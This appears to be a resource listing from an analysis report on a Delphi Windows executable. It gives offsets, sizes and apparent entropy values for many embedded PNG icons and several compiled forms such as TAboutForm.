RT_RCDATA | 0x10d2bcc | 0x274 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.017515923566879
RT_RCDATA | 0x10d2e40 | 0x1ef | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0222222222222221
RT_RCDATA | 0x10d3030 | 0x2ea | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0147453083109919
RT_RCDATA | 0x10d331c | 0x377 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.012401352874859
RT_RCDATA | 0x10d3694 | 0x175 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0
RT_RCDATA | 0x10d380c | 0x173 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0080862533692723
RT_RCDATA | 0x10d3980 | 0x1f2 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0140562248995983
RT_RCDATA | 0x10d3b74 | 0x194 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0222772277227723
RT_RCDATA | 0x10d3d08 | 0x1d4 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0235042735042734
RT_RCDATA | 0x10d3edc | 0x22c | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0197841726618706
RT_RCDATA | 0x10d4108 | 0x2c8 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0154494382022472
RT_RCDATA | 0x10d43d0 | 0x41e | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0104364326375712
RT_RCDATA | 0x10d47f0 | 0x528 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0083333333333333
RT_RCDATA | 0x10d4d18 | 0x139 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0191693290734825
RT_RCDATA | 0x10d4e54 | 0x142 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0279503105590062
RT_RCDATA | 0x10d4f98 | 0x1a1 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.026378896882494
RT_RCDATA | 0x10d513c | 0x167 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0222841225626742
RT_RCDATA | 0x10d52a4 | 0x1b9 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.018140589569161
RT_RCDATA | 0x10d5460 | 0x1dd | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0230607966457024
RT_RCDATA | 0x10d5640 | 0x132 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.022875816993464
RT_RCDATA | 0x10d5774 | 0x180 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0286458333333333
RT_RCDATA | 0x10d58f4 | 0x17c | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0289473684210526
RT_RCDATA | 0x10d5a70 | 0x139 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0191693290734825
RT_RCDATA | 0x10d5bac | 0x142 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0279503105590062
RT_RCDATA | 0x10d5cf0 | 0x1a1 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.026378896882494
RT_RCDATA | 0x10d5e94 | 0x1f3 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0220440881763526
RT_RCDATA | 0x10d6088 | 0x2f7 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0144927536231885
RT_RCDATA | 0x10d6380 | 0x3c0 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0114583333333333
RT_RCDATA | 0x10d6740 | 0x288 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0169753086419753
RT_RCDATA | 0x10d69c8 | 0x41f | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0104265402843602
RT_RCDATA | 0x10d6de8 | 0x58b | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0077519379844961
RT_RCDATA | 0x10d7374 | 0x2a1 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0163447251114412
RT_RCDATA | 0x10d7618 | 0x40a | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0106382978723405
RT_RCDATA | 0x10d7a24 | 0x58e | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0077355836849509
RT_RCDATA | 0x10d7fb4 | 0x29f | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0163934426229508
RT_RCDATA | 0x10d8254 | 0x3f8 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0108267716535433
RT_RCDATA | 0x10d864c | 0x587 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.007773851590106
RT_RCDATA | 0x10d8bd4 | 0x12c | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0166666666666666
RT_RCDATA | 0x10d8d00 | 0x177 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0293333333333334
RT_RCDATA | 0x10d8e78 | 0x195 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0271604938271606
RT_RCDATA | 0x10d9010 | 0x228 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.019927536231884
RT_RCDATA | 0x10d9238 | 0x326 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0136476426799008
RT_RCDATA | 0x10d9560 | 0x3c6 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0113871635610765
RT_RCDATA | 0x10d9928 | 0x12c | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0166666666666666
RT_RCDATA | 0x10d9a54 | 0x177 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0293333333333334
RT_RCDATA | 0x10d9bcc | 0x195 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0271604938271606
RT_RCDATA | 0x10d9d64 | 0x31b | PNG image data, 16 x 16, 8-bit/color RGBA, interlaced | | | 1.0138364779874214
RT_RCDATA | 0x10da080 | 0x4c8 | PNG image data, 24 x 24, 8-bit/color RGBA, interlaced | | | 1.0089869281045751
RT_RCDATA | 0x10da548 | 0x70d | PNG image data, 32 x 32, 8-bit/color RGBA, interlaced | | | 1.0060941828254848
RT_RCDATA | 0x10dac58 | 0xe9 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 0.9828326180257511
RT_RCDATA | 0x10dad44 | 0x10d | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 0.9814126394052045
RT_RCDATA | 0x10dae54 | 0x11c | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0035211267605635
RT_RCDATA | 0x10daf70 | 0x258 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0183333333333333
RT_RCDATA | 0x10db1c8 | 0x320 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.01375
RT_RCDATA | 0x10db4e8 | 0x3f6 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0108481262327416
RT_RCDATA | 0x10db8e0 | 0x176 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0133689839572193
RT_RCDATA | 0x10dba58 | 0x1a2 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.014354066985646
RT_RCDATA | 0x10dbbfc | 0x1ca | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0240174672489082
RT_RCDATA | 0x10dbdc8 | 0x171 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.018970189701897
RT_RCDATA | 0x10dbf3c | 0x1a3 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0214797136038185
RT_RCDATA | 0x10dc0e0 | 0x1c4 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0243362831858407
RT_RCDATA | 0x10dc2a4 | 0x193 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.022332506203474
RT_RCDATA | 0x10dc438 | 0x1b2 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0069124423963134
RT_RCDATA | 0x10dc5ec | 0x1e0 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 0.9979166666666667
RT_RCDATA | 0x10dc7cc | 0x151 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0089020771513353
RT_RCDATA | 0x10dc920 | 0x174 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0080645161290323
RT_RCDATA | 0x10dca94 | 0x192 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0124378109452736
RT_RCDATA | 0x10dcc28 | 0x1b5 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0251716247139588
RT_RCDATA | 0x10dcde0 | 0x27d | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0172684458398744
RT_RCDATA | 0x10dd060 | 0x3ae | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0116772823779194
RT_RCDATA | 0x10dd410 | 0x14c | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0060240963855422
RT_RCDATA | 0x10dd55c | 0x170 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0054347826086956
RT_RCDATA | 0x10dd6cc | 0x18f | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0275689223057645
RT_RCDATA | 0x10dd85c | 0x37d | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0123180291153415
RT_RCDATA | 0x10ddbdc | 0x554 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0080645161290323
RT_RCDATA | 0x10de130 | 0x632 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0069356872635562
RT_RCDATA | 0x10de764 | 0x15b | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0172910662824208
RT_RCDATA | 0x10de8c0 | 0x19c | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0218446601941749
RT_RCDATA | 0x10dea5c | 0x216 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0205992509363295
RT_RCDATA | 0x10dec74 | 0x717 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.006060606060606
RT_RCDATA | 0x10df38c | 0xc40 | PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced | | | 1.0035076530612246
RT_RCDATA | 0x10dffcc | 0x1170 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | | | 1.002464157706093
RT_RCDATA | 0x10e113c | 0x625 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.006993006993007
RT_RCDATA | 0x10e1764 | 0xa3b | PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced | | | 1.0042000763650247
RT_RCDATA | 0x10e21a0 | 0xecf | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | | | 1.002901609074123
RT_RCDATA | 0x10e3070 | 0x63e | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.006883604505632
RT_RCDATA | 0x10e36b0 | 0xa70 | PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced | | | 1.0041167664670658
RT_RCDATA | 0x10e4120 | 0xf48 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | | | 1.0028118609406953
RT_RCDATA | 0x10e5068 | 0x5d7 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0073578595317725
RT_RCDATA | 0x10e5640 | 0x938 | PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced | | | 1.0046610169491526
RT_RCDATA | 0x10e5f78 | 0xd2e | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | | | 1.0032602252519265
RT_RCDATA | 0x10e6ca8 | 0x38e | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.012087912087912
RT_RCDATA | 0x10e7038 | 0x561 | PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced | | | 1.0079883805374001
RT_RCDATA | 0x10e759c | 0x7a1 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | | | 1.0056323604710702
RT_RCDATA | 0x10e7d40 | 0x237 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0194003527336861
RT_RCDATA | 0x10e7f78 | 0x36b | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0125714285714287
RT_RCDATA | 0x10e82e4 | 0x475 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0096406660823838
RT_RCDATA | 0x10e875c | 0x223 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0201096892138939
RT_RCDATA | 0x10e8980 | 0x314 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.013959390862944
RT_RCDATA | 0x10e8c94 | 0x3a4 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.011802575107296
RT_RCDATA | 0x10e9038 | 0x1ff | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0215264187866928
RT_RCDATA | 0x10e9238 | 0x308 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0141752577319587
RT_RCDATA | 0x10e9540 | 0x438 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.010185185185185
RT_RCDATA | 0x10e9978 | 0x1ec | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0223577235772359
RT_RCDATA | 0x10e9b64 | 0x2b2 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0159420289855072
RT_RCDATA | 0x10e9e18 | 0x3a9 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0117395944503735
RT_RCDATA | 0x10ea1c4 | 0x225 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0200364298724955
RT_RCDATA | 0x10ea3ec | 0x2a1 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0163447251114412
RT_RCDATA | 0x10ea690 | 0x3dd | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0111223458038423
RT_RCDATA | 0x10eaa70 | 0x4cf | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0089358245329
RT_RCDATA | 0x10eaf40 | 0x2bf | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0156472261735419
RT_RCDATA | 0x10eb200 | 0x3ea | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0109780439121756
RT_RCDATA | 0x10eb5ec | 0x4d5 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0088924818108327
RT_RCDATA | 0x10ebac4 | 0x2cb | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0153846153846153
RT_RCDATA | 0x10ebd90 | 0x306 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0142118863049097
RT_RCDATA | 0x10ec098 | 0x16e | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.030054644808743
RT_RCDATA | 0x10ec208 | 0x1fd | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0216110019646365
RT_RCDATA | 0x10ec408 | 0x2ac | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0160818713450293
RT_RCDATA | 0x10ec6b4 | 0x21a | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.020446096654275
RT_RCDATA | 0x10ec8d0 | 0x2f4 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0145502645502646
RT_RCDATA | 0x10ecbc4 | 0x420 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0104166666666667
RT_RCDATA | 0x10ecfe4 | 0x230 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.019642857142857
RT_RCDATA | 0x10ed214 | 0x2a3 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0162962962962963
RT_RCDATA | 0x10ed4b8 | 0x3bd | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0114942528735633
RT_RCDATA | 0x10ed878 | 0x547 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.008142116950407
RT_RCDATA | 0x10eddc0 | 0x2ae | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0160349854227406
RT_RCDATA | 0x10ee070 | 0x3dd | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0111223458038423
RT_RCDATA | 0x10ee450 | 0x55a | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.008029197080292
RT_RCDATA | 0x10ee9ac | 0x2ff | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.014341590612777
RT_RCDATA | 0x10eecac | 0x3ef | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0109235352532273
RT_RCDATA | 0x10ef09c | 0xd7 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 0.986046511627907
RT_RCDATA | 0x10ef174 | 0x11b | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 0.9964664310954063
RT_RCDATA | 0x10ef290 | 0xf9 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0
RT_RCDATA | 0x10ef38c | 0x1c4 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0243362831858407
RT_RCDATA | 0x10ef550 | 0x2e4 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0148648648648648
RT_RCDATA | 0x10ef834 | 0x367 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0126291618828933
RT_RCDATA | 0x10efb9c | 0x1c8 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0241228070175439
RT_RCDATA | 0x10efd64 | 0x2ab | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0161054172767203
RT_RCDATA | 0x10f0010 | 0x2ef | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.014647137150466
RT_RCDATA | 0x10f0300 | 0x26d | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0177133655394526
RT_RCDATA | 0x10f0570 | 0x3e6 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0110220440881763
RT_RCDATA | 0x10f0958 | 0x5a0 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.007638888888889
RT_RCDATA | 0x10f0ef8 | 0x2fb | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0144167758846658
RT_RCDATA | 0x10f11f4 | 0x52b | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0083144368858654
RT_RCDATA | 0x10f1720 | 0x6c8 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.006336405529954
RT_RCDATA | 0x10f1de8 | 0x236 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.019434628975265
RT_RCDATA | 0x10f2020 | 0x347 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0131108462455305
RT_RCDATA | 0x10f2368 | 0x3f9 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0108161258603736
RT_RCDATA | 0x10f2764 | 0x148 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0152439024390243
RT_RCDATA | 0x10f28ac | 0x174 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0134408602150538
RT_RCDATA | 0x10f2a20 | 0x192 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0199004975124377
RT_RCDATA | 0x10f2bb4 | 0x135 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 0.9935275080906149
RT_RCDATA | 0x10f2cec | 0x1c8 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.019736842105263
RT_RCDATA | 0x10f2eb4 | 0x259 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0183028286189684
RT_RCDATA | 0x10f3110 | 0x2f6 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0145118733509235
RT_RCDATA | 0x10f3408 | 0x477 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0096237970253719
RT_RCDATA | 0x10f3880 | 0x5d5 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0073677160080374
RT_RCDATA | 0x10f3e58 | 0x155 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0117302052785924
RT_RCDATA | 0x10f3fb0 | 0x1b2 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0253456221198156
RT_RCDATA | 0x10f4164 | 0x20e | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.020912547528517
RT_RCDATA | 0x10f4374 | 0xf8 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0
RT_RCDATA | 0x10f446c | 0x131 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0065573770491802
RT_RCDATA | 0x10f45a0 | 0x139 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0095846645367412
RT_RCDATA | 0x10f46dc | 0x190 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0225
RT_RCDATA | 0x10f486c | 0x25e | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.018151815181518
RT_RCDATA | 0x10f4acc | 0x340 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0132211538461537
RT_RCDATA | 0x10f4e0c | 0x2e0 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.014945652173913
RT_RCDATA | 0x10f50ec | 0x453 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.009936766034327
RT_RCDATA | 0x10f5540 | 0x5c0 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0074728260869565
RT_RCDATA | 0x10f5b00 | 0xa6 | PNG image data, 9 x 9, 8-bit/color RGBA, non-interlaced | | | 0.963855421686747
RT_RCDATA | 0x10f5ba8 | 0xc6 | PNG image data, 13 x 13, 8-bit/color RGBA, non-interlaced | | | 0.9696969696969697
RT_RCDATA | 0x10f5c70 | 0xcb | PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced | | | 0.9802955665024631
RT_RCDATA | 0x10f5d3c | 0x16f | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.0190735694822888
RT_RCDATA | 0x10f5eac | 0x194 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0198019801980198
RT_RCDATA | 0x10f6040 | 0x243 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0189982728842832
RT_RCDATA | 0x10f6284 | 0x108 | PNG image data, 8 x 8, 8-bit/color RGBA, non-interlaced | | | 1.0
RT_RCDATA | 0x10f638c | 0x162 | PNG image data, 12 x 12, 8-bit/color RGBA, non-interlaced | | | 1.0141242937853108
RT_RCDATA | 0x10f64f0 | 0x17d | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | | | 1.020997375328084
RT_RCDATA | 0x10f6670 | 0x1b1 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0184757505773672
RT_RCDATA | 0x10f6824 | 0x23f | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | | | 1.0191304347826087
RT_RCDATA | 0x10f6a64 | 0x12d | PNG image data, 8 x 8, 8-bit/color RGBA, non-interlaced | | | 1.0066445182724253
RT_RCDATA | 0x10f6b94 | 0x15d | PNG image data, 12 x 12, 8-bit/color RGBA, non-interlaced | | | 1.0143266475644699
RT_RCDATA | 0x10f6cf4 | 0x2303 | Delphi compiled form 'TAboutForm' | | | 0.2762467923686266
RT_RCDATA | 0x10f8ff8 | 0x75 | Delphi compiled form 'TAbstractOptionsEditorDialog' | | | 0.8461538461538461
RT_RCDATA | 0x10f9070 | 0x264 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0179738562091503
RT_RCDATA | 0x10f92d4 | 0x396 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | | | 1.0119825708061003
RT_RCDATA | 0x10f966c | 0x3a7 | PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced | | | 1.011764705882353
RT_RCDATA | 0x10f9a14 | 0x1b9 | Delphi compiled form 'TCalendarPopupForm' | | | 0.6054421768707483
RT_RCDATA | 0x10f9bd0 | 0x893 | Delphi compiled form 'TChangeParentDlg' | | | 0.3362186788154897
RT_RCDATA | 0x10fa464 | 0x227 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0199637023593466
RT_RCDATA | 0x10fa68c | 0x1dd | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0230607966457024
RT_RCDATA | 0x10fa86c | 0x2d2 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | | | 1.0152354570637119
RT_RCDATA | 0x10fab40 | 0x335 | PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced | | | 1.0133982947624847
RT_RCDATA | 0x10fae78 | 0x21a | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.020446096654275
RT_RCDATA | 0x10fb094 | 0x318 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | | | 1.0138888888888888
RT_RCDATA | 0x10fb3ac | 0x36b | PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced | | | 1.0125714285714287
RT_RCDATA | 0x10fb718 | 0x300 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0143229166666667
RT_RCDATA | 0x10fba18 | 0x43e | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | | | 1.0101289134438305
RT_RCDATA | 0x10fbe58 | 0x580 | PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced | | | 1.0078125
RT_RCDATA | 0x10fc3d8 | 0x3ca | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.011340206185567
RT_RCDATA | 0x10fc7a4 | 0x5f1 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | | | 1.0072320841551612
RT_RCDATA | 0x10fcd98 | 0x7ee | PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced | | | 1.0054187192118227
RT_RCDATA | 0x10fd588 | 0x282 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.017133956386293
RT_RCDATA | 0x10fd80c | 0x372 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | | | 1.0124716553287982
RT_RCDATA | 0x10fdb80 | 0x3ed | PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced | | | 1.0109452736318407
RT_RCDATA | 0x10fdf70 | 0x256 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0183946488294315
RT_RCDATA | 0x10fe1c8 | 0x35f | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | | | 1.0127462340672073
RT_RCDATA | 0x10fe528 | 0x3a3 | PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced | | | 1.011815252416756
RT_RCDATA | 0x10fe8cc | 0x251 | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0185497470489038
RT_RCDATA | 0x10feb20 | 0x38f | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | | | 1.0120746432491767
RT_RCDATA | 0x10feeb0 | 0x3f9 | PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced | | | 1.0108161258603736
RT_RCDATA | 0x10ff2ac | 0x30f | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | | | 1.0140485312899106
                          RT_RCDATA0x10ff5bc0x46ePNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.009700176366843
                          RT_RCDATA0x10ffa2c0x5afPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0075601374570446
                          RT_RCDATA0x10fffdc0x2e7PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0148048452220726
                          RT_RCDATA0x11002c40x47dPNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.009573542210618
                          RT_RCDATA0x11007440x530PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0082831325301205
                          RT_RCDATA0x1100c740x25aPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0182724252491695
                          RT_RCDATA0x1100ed00x3e6PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0110220440881763
